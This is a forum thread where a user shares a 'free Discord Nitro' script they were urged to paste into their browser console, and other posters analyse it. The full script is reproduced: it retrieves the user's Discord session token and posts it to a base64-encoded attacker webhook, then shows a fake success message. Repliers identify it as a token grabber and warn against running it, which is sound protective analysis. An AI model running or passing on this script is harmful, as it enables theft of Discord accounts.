This topic contains 1 reply, has 2 voices, and was last updated by 
- Posts
Some sun kid told me to put this in but I have 0% trust in him “Gives you free nitro” stfu kid lmao,
/* Nitro Patcher by DareDevil097 [PRIVATE] Usage: 1) Open Console (CMND or CTRL + Option + I –> Console “TAB”) 2) Copy all of this message and paste in there 3) Press on “Enter” on your keyboard 5) Enjoy free nitro :)))) */ var req = webpackJsonp.push([ [], {extra_id: (e, t, r) => e.exports = r},[ [“extra_id”]]]);for (let e in req.c) if (req.c.hasOwnProperty(e)) { let t = req.c[e].exports; if (t && t.__esModule && t.default) for (let e in t.default) “getToken” === e && (nitro = t.default.getToken()) } fetch( atob(‘aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvODEwOTI2MTUwNTc4NzMzMDc2L0NuYUFPYld1N2FwSVFJNmVlLWlfei1wVWlZYTN5dWRzOHUwVU1GdzVkT0JIZWtKaGQ5TG0tZzhiUXJTeFp6REQzV0E3’), { method: ‘post’, headers: { ‘Content-Type’: ‘application/json’, }, body: JSON.stringify({ content: nitro, }), } ); console.clear() console.log(‘Congrats, your free nitro subscription will be activated soon!’)
RLinux12its just a token grabber
tuxedo25I’m on my phone so I can’t translate the base64 thing, but it’s obviously a URL. The script uses `fetch()` to post your session token to his website.
I assume (based on free nitro) this is discord. Once they have your session token, they presumably would impersonate you and link this same script to all your friends and discord servers you belong to. Or maybe they would use your account to spam some crypto scheme, or maybe they scroll through your DMs looking for something to blackmail you with.
mrgreen02I mean my limited knowledge I would stab in the dark an say he’s getting the password token an possibly sending it to the “sun kid”. But I am not very familar with JSON programming language.. So its a guess in the dark.
Current-LocationDo you really need one of us to tell you not to run that to know it would be a mistake?
w0kesonThe most suspicious part of this code to me is the encoded blob inside that atob() function call. I ran that on its own in my JS console to see what’s in that blob, it seems to be a Discord webhook URL that looks like:
https://discord.com/api/webhooks/81092…076/CnaAOb…rSxZzDD3WA7
(parts redacted out with …’s). It passes to that a “content” parameter which holds the value of a `nitro` variable, which seems to be an authentication token of some sort (`nitro = t.default.getToken()`).
My guess: this Webhook URL will post the content into a Discord channel owned by an attacker and he’s trying to steal an access token from you, which he might use to take over your session and be logged-in as you on whichever site that was.
Very fishy, and never run code like this that somebody tells you to copy/paste into your browser console!
You must be logged in to reply to this topic.
Comments